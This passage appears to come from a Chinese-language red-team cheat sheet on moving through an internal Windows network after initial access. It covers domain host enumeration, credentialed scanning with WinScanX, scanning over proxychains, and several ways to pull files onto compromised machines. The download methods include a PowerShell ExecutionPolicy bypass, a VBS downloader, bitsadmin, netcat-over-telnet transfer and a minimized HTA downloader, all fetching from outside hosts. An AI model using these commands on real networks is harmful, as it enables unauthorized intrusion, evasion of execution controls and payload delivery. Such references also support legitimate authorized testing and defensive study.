</code></pre><p><img src="pic/4/1.jpg" alt=""><br>其中信息:<br>SHARING 表示开放来共享,<br>DC 表示可能是域控,或者是辅助域控<br>U=user 猜测此计算机登陆名<br>IIS 表示运行来web80<br>EXCHANGE Microsoft Exchange服务<br>NOTES Lotus Notes服务</p><p>2、WinScanX<br>需要登录账号能够获取目标很详细的内容。其中还有snmp获取,windows密码猜解(但是容易被杀,nishang中也实现出一个类似的信息获取/Gather/Get-Information.ps1)</p><pre><code data-origin="<pre><code>WinScanX.exe -3 DC1 centoso\pentest password -a &gt; test.txt
</code></pre>">WinScanX.exe -3 DC1 centoso\pentest password -a > test.txt
</code></pre><p><img src="pic/4/2.jpg" alt=""></p><p>3、端口扫描<br>InsightScan<br>proxy_socket后,直接</p><pre><code data-origin="<pre><code>proxychains python scanner.py 192.168.0.0/24 -N
</code></pre>">proxychains python scanner.py 192.168.0.0/24 -N
</code></pre><p><a href="http://insight-labs.org/?p=981">http://insight-labs.org/?p=981</a></p><h3 id="内网文件传输"><a name="内网文件传输" href="#内网文件传输"></a>内网文件传输</h3><h5 id="windows下文件传输"><a name="windows下文件传输" href="#windows下文件传输"></a>windows下文件传输</h5><p>1、powershell文件下载<br>powershell突破限制执行:powershell -ExecutionPolicy Bypass -File .\1.ps1</p><pre><code data-origin="<pre><code>$d = New-Object System.Net.WebClient
$d.DownloadFile("http://lemon.com/file.zip","c:/1.zip")
</code></pre>">$d = New-Object System.Net.WebClient
$d.DownloadFile("http://lemon.com/file.zip","c:/1.zip")
</code></pre><p>2、vbs脚本文件下载</p><pre class="php hljs"><code class="php" data-origin="<pre><code class="php">Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.206.101/file.zip",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "c:\file.zip",2
</code></pre>">Set xPost=createObject(<span class="hljs-string">"Microsoft.XMLHTTP"</span>)
xPost.Open <span class="hljs-string">"GET"</span>,<span class="hljs-string">"http://192.168.206.101/file.zip"</span>,<span class="hljs-number">0</span>
xPost.Send()
set sGet=createObject(<span class="hljs-string">"ADODB.Stream"</span>)
sGet.Mode=<span class="hljs-number">3</span>
sGet.Type=<span class="hljs-number">1</span>
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile <span class="hljs-string">"c:\file.zip"</span>,<span class="hljs-number">2</span>
</code></pre><p>下载执行:</p><pre><code data-origin="<pre><code>cscript test.vbs
</code></pre>">cscript test.vbs
</code></pre><p>3、bitsadmin<br>win03测试没有,win08有</p><pre><code data-origin="<pre><code>bitsadmin /transfer n http://lemon.com/file.zip c:\1.zip
</code></pre>">bitsadmin /transfer n http://lemon.com/file.zip c:\1.zip
</code></pre><p>4、文件共享<br>映射了一个,结果没有权限写</p><pre><code data-origin="<pre><code>net use x: \\127.0.0.1\share /user:centoso.com\userID myPassword
</code></pre>">net use x: \\127.0.0.1\share /user:centoso.com\userID myPassword
</code></pre><p>5、使用telnet接收数据</p><pre><code data-origin="<pre><code>服务端:nc -lvp 23 &lt; nc.exe
下载端:telnet ip -f c:\nc.exe
</code></pre>">服务端:nc -lvp 23 < nc.exe
下载端:telnet ip -f c:\nc.exe
</code></pre><p>6、hta<br>保存为.hta文件后运行</p><pre><code class="html" data-origin="<pre><code class="html">&lt;html&gt;
&lt;head&gt;
&lt;script&gt;
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.206.101/demo.php.zip",false);
Object.send();
if (Object.Status == 200)
{
var Stream = new ActiveXObject("ADODB.Stream");
Stream.Open();
Stream.Type = 1;
Stream.Write(Object.ResponseBody);
Stream.SaveToFile("C:\\demo.zip", 2);
Stream.Close();
}
window.close();
&lt;/script&gt;
&lt;HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize"&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>"><html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.206.101/demo.php.zip",false);
Object.send();
if (Object.Status == 200)
{
var Stream = new ActiveXObject("ADODB.Stream");
Stream.Open();
Stream.Type = 1;
Stream.Write(Object.ResponseBody);
Stream.SaveToFile("C:\\demo.zip", 2);
Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</head>
<body>
</body>
</html>